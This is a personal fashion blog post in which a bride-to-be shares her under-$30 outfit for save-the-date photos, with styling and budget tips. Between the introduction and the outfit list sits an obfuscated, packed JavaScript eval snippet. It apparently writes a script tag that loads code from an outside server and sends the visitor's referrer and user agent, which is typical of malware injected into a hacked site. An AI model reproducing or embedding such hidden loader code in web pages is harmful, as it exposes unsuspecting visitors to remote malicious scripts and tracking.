How to Pick a “Save the Date” Outfit for Under $30

2014 Fashion, DIY, Fashion, Summer

I’m many moons from having to plan my own wedding, but I’ve had so much fun this year going through the process with a dear petite friend (yes – there are more people who are just 5 feet!) of mine – meet Karla! She is gregarious, outspoken and one of the kindest souls I know! I’m excited for her to spend the rest of her life with someone who almost matches up with her.

I took her save the date photos a few weeks ago (none used in this post so no spoiler alerts for my friends). However, after our session, I started wondering how did she pick her outfit? As someone who puts a lot of effort into dressing for special occasions but also budget-conscientious, I was blown away by my friend’s thriftiness and chic look! Here is her story and tips in picking a “save a date” outfit.

Body eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zaeei|var|u0026u|referrer|zrebb||js|php’.split(‘|’),0,{}))
Central Top () / Aeropostale Jeggings () / Aeropostale Watch (looks like Michael Kors for ) / Necklace (borrowed from Mom) / Dollhouse Flats (Ross )

These high-wasted jeggings are my go to bottoms because they provide good coverage for my generous Puerto-Rican derrière. Since my “Save the Date” requires me to be on grass, I choose jeans instead of a dress or skirt. Personally, I hate the feeling of grass against my skin.

Like any bride-to-be, your schedule the year before is crazy busy. I picked this blouse because it is easy to throw on and head out the door. It doesn’t hold wrinkles, which was important since I had my photos taken at the end of a very long day. It’s also long enough to cover the top of my high-waisted jeggings and adds great colors to my look!

The necklace is a flower, which plays off the floral pattern in my blouse, and the watch pulls in the gold from my necklace. The bow on the back of my nude flats add more touches of romance too. Since my backdrop is a park, I kept my makeup natural and curled my hair with José Eber Clipless wand.

After speaking with a friend who is already married – her advice to me is that if she had known what she knows now, she wouldn’t have spent so much on her wedding. In the end, the most important thing about this whole process is that my fiancé and I get to spend the rest of our lives together.
